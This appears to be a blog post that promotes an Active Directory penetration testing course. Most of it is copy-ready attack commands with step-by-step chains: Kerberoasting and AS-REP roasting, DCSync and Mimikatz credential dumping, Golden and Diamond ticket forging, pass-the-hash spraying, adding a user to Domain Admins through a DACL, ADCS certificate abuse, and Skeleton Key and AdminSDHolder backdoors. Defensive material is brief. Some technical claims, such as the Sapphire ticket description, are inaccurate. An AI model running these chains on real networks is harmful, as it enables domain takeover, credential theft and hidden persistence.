Master Active Directory Penetration Testing: From Kerberos Abuse to Diamond Tickets – Your Ultimate Training Guide + Video

Listen to this Post

Featured Image

Introduction:

Active Directory (AD) remains the primary authentication and authorization hub for most enterprise networks, making it a prime target for attackers. A single misconfiguration or weak Kerberos ticket can lead to full domain compromise, as demonstrated by techniques like Golden Ticket and DCSync. This article distills advanced AD penetration testing concepts from a professional training program, providing hands-on commands, attack walkthroughs, and defensive insights across Linux and Windows environments.

Learning Objectives:

  • Execute initial AD enumeration and exploitation using tools like BloodHound, SharpHound, and ldapsearch.
  • Abuse Kerberos authentication (AS-REP Roasting, Kerberoasting) and craft Diamond/Sapphire tickets.
  • Perform credential dumping, privilege escalation, lateral movement, and DACL/ADCS attacks.

You Should Know:

1. Initial Active Directory Exploitation & Post‑Enumeration

Before any attack, you must map the AD environment. Start with unauthenticated LDAP queries or a low-privilege domain user.

Linux commands (using impacket and ldapsearch):

 Enumerate domain users without creds (if null bind allowed)
ldapsearch -x -H ldap://<DC-IP> -b "DC=example,DC=com" -s sub "(objectClass=user)" | grep sAMAccountName

Using impacket’s GetADUsers.py with credentials
GetADUsers.py -all <domain>/<user>:'<password>' -dc-ip <DC-IP>

BloodHound ingestor (SharpHound on Windows, then import)
bloodhound-python -d <domain> -u <user> -p '<password>' -ns <DC-IP> -c All

Windows PowerShell (as domain user):

 AD module enumeration
Get-ADUser -Filter  -Properties  | select SamAccountName, MemberOf
Get-ADGroup -Filter  | select Name, GroupCategory

SharpHound collector
.\SharpHound.exe -c All --domain <domain> --ldapusername <user> --ldappassword '<password>'

Step‑by‑step guide:

  1. Obtain a domain user account (e.g., via phishing or a service account).
  2. Run BloodHound to identify attack paths – look for “Shortest Path to Domain Admin”.
  3. Use `ldapsearch` or `ADSI` to find users with `KerberosPreAuth` not required (AS-REP roastable).
  4. Enumerate SMB shares and RDP access with crackmapexec:
    crackmapexec smb <IP-range> -u <user> -p '<password>' --shares
    

  5. Abusing Kerberos: AS‑REP Roasting, Kerberoasting, and Ticket Attacks

Kerberos misconfigurations allow attackers to request service tickets offline‑crackable or forge high‑privilege tickets.

AS‑REP Roasting (no pre‑auth):

 Linux: impacket-GetNPUsers
impacket-GetNPUsers -dc-ip <DC-IP> <domain>/<user> -request -format hashcat

Windows: Rubeus
Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt

Kerberoasting (crack service account hashes):

 Linux
impacket-GetUserSPNs -dc-ip <DC-IP> <domain>/<user> -request -outputfile kerb.txt

Windows
Rubeus.exe kerberoast /outfile:kerb.txt

Crack with hashcat (-m 13100 for RC4 or `-m 19600` for AES) or John.

Diamond & Sapphire Tickets (new in training):

  • Diamond Ticket – Decrypt a legitimate TGT using the KRBTGT hash, then modify the PAC to impersonate any user (including Domain Admin). It bypasses many detection rules because the ticket is properly encrypted.
  • Sapphire Ticket – Similar but uses AES256 keys and includes extra checks.

Step‑by‑step:

  1. Extract KRBTGT hash via DCSync or LSASS dump.
    Using secretsdump.py
    impacket-secretsdump -just-dc <domain>/<admin>:'<password>'@<DC-IP>
    

2. Forge a Diamond Ticket with Rubeus:

Rubeus.exe diamond /krbkey:<KRBTGT_AES256> /user:Administrator /domain:<domain> /dc:<DC-IP> /ptt

3. Access any resource (e.g., dir \\DC\c$) – you are now Domain Admin.

3. Advanced Credential Dumping Attacks

Modern AD penetration requires extracting NTLM hashes, Kerberos keys, and plaintext secrets from memory and NTDS.dit.

Mimikatz (Windows):

privilege::debug
sekurlsa::logonpasswords  Dump LSASS
lsadump::lsa /inject  Extract LSA secrets
lsadump::dcsync /user:krbtgt  DCSync without touching DC

Linux alternatives (impacket):

 DCSync
impacket-secretsdump -just-dc <domain>/<user>:'<password>'@<DC-IP>

Dump NTDS.dit from a volume shadow copy (requires admin)
impacket-secretsdump -ntds ntds.dit -system SYSTEM -hashes <LM:NTLM> local

Defensive command (detect LSASS access):

 Windows Event 4656 (Handle to LSASS requested)
Get-WinEvent -LogName Security | Where-Object { $<em>.Id -eq 4656 -and $</em>.Message -like "lsass.exe" }

Step‑by‑step guide:

  1. Gain admin on a domain‑joined machine or DC.
  2. Run Mimikatz `sekurlsa::logonpasswords` – often reveals domain admin hashes.
  3. Use DCSync if you have replication rights (e.g., via Exchange AD‑Sync group).
  4. Crack hashes with hashcat (-m 1000 for NTLM) or pass‑the‑hash directly.

4. Privilege Escalation & Lateral Movement Strategies

Once you have one foothold, escalate privileges using misconfigured ACLs, unpatched services, or Kerberos delegation.

Common escalation vectors:

  • Unconstrained delegation – Steal TGTs from admin users connecting to a compromised machine.
  • Constrained delegation abuse – Impersonate users to any service (e.g., CIFS).
  • Local privilege escalation – PrintNightmare, ZeroLogon, or potato attacks.

Lateral movement commands:

 Pass-the-Hash (PsExec)
impacket-psexec -hashes <LM:NTLM> <domain>/<user>@<target-IP>

WinRM using Evil-WinRM
evil-winrm -i <target-IP> -u <user> -H '<NTLM>'

Scheduled task lateral movement
schtasks /create /S <target-IP> /SC ONCE /ST 00:00 /TN "update" /TR "calc.exe" /RU "SYSTEM"

Step‑by‑step:

  1. Enumerate local admin privileges on remote machines (net localgroup administrators via WMI).

2. Use `crackmapexec` to test password/hash spray:

crackmapexec smb <targets.txt> -u users.txt -H hashes.txt --continue-on-success

3. Once inside, run `whoami /priv` to check for SeImpersonate or SeBackupPrivilege – then use `PrintSpoofer` or JuicyPotato.

  1. DACL Abuse & ADCS Attacks (New in Training)

Discretionary Access Control Lists (DACLs) are often over‑permissive, allowing a regular user to modify group membership or reset passwords. Active Directory Certificate Services (ADCS) misconfigurations lead to immediate domain admin.

DACL abuse example (Add a user to Domain Admins):

 PowerView (part of PowerSploit)
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity <attacker_user> -Rights WriteMembers
Add-DomainGroupMember -Identity "Domain Admins" -Member <attacker_user>

ADCS attack (ESC1 – vulnerable certificate template):

 Request a certificate with a malicious SAN (Subject Alternative Name)
certipy req -ca <CA-Name> -template <VulnTemplate> -upn [email protected]

Then use the certificate for Kerberos authentication via `certipy auth` or Rubeus.

Step‑by‑step:

  1. Enumerate ACLs with BloodHound – look for WriteOwner, WriteDacl, `GenericAll` on high‑value groups.
  2. Abuse a misconfigured DACL using `Set-ADObject` or PowerView.
  3. For ADCS, run `certipy find` – identify ESC1, ESC2, or ESC8 templates.
  4. Request a certificate for Domain Admin and use `Rubeus asktgt` to obtain a TGT.

6. Persistence Methods

After compromise, ensure you can return. AD offers many persistence vectors beyond a simple backdoor.

Golden Ticket (classic persistence):

 Using KRBTGT hash to forge any user TGT
mimikatz.exe "kerberos::golden /user:Administrator /domain:<domain> /sid:<domain-SID> /krbtgt:<hash> /ptt"

Skeleton Key (Linux‑style backdoor):

 Inject a master password into LSASS (requires admin on DC)
mimikatz.exe "privilege::debug" "misc::skeleton"
 Any user can now authenticate with password 'mimikatz'

Other persistence techniques:

  • AdminSDHolder backdoor – add user to `AdminSDHolder` with `WriteDacl` rights, propagates every 60 minutes.
  • Security group monitoring bypass – create a hidden group that grants admin rights.
  • DSRM persistence – set the Directory Services Restore Mode password to a known hash.

Step‑by‑step:

  1. After DA access, extract KRBTGT hash with DCSync.
  2. Create a Golden Ticket with a 10‑year lifetime.

3. Test by accessing the DC: `dir \\DC\c$`.

  1. Install a Skeleton Key for fallback (defenders often miss it because LSASS is legitimate).

What Undercode Say:

  • Key Takeaway 1: Modern AD penetration is not just about running Mimikatz; it requires chaining techniques like AS-REP roasting, DCSync, and ADCS abuse. Defenders must monitor for unusual Kerberos ticket requests (Event ID 4769) and LDAP query anomalies.
  • Key Takeaway 2: Training courses like the one highlighted (Ignite Technologies) are essential because AD attacks evolve rapidly – Diamond/Sapphire tickets and DACL abuses are now standard in red team toolkits. Hands‑on practice with commands like certipy, Rubeus, and `bloodhound-python` is non‑negotiable for security professionals.

Analysis: The intersection of Kerberos cryptography and Windows ACLs creates a complex attack surface. While Golden Tickets are well‑known, newer techniques like Diamond Tickets bypass many EDRs because they use valid encryption instead of forging PAC entirely. Meanwhile, ADCS misconfigurations have become the 1 quick‑win for attackers – yet most blue teams still ignore certificate templates. Organizations must prioritize hardening Kerberos (enable AES, disable RC4), implement Protected Users group, and regularly audit ADCS with tools like `Certify` or PKINITtools.

Prediction:

As Microsoft pushes cloud‑native identity (Entra ID) and Kerberos improvements (e.g., disabling RC4 by default in 2025 updates), attackers will shift focus to hybrid AD scenarios and cross‑tenant trust abuse. However, on‑prem AD will remain a critical target for at least another decade because of legacy systems. We predict a surge in “ADCS as a service” exploits and AI‑driven BloodHound pathfinding – where large language models auto‑generate attack chains from DACL misconfigurations. Blue teams must adopt continuous AD reconnaissance (e.g., Purple Knight, PingCastle) and treat certificate services with the same rigor as domain controllers.

▶️ Related Video (76% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Ad Pentest – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky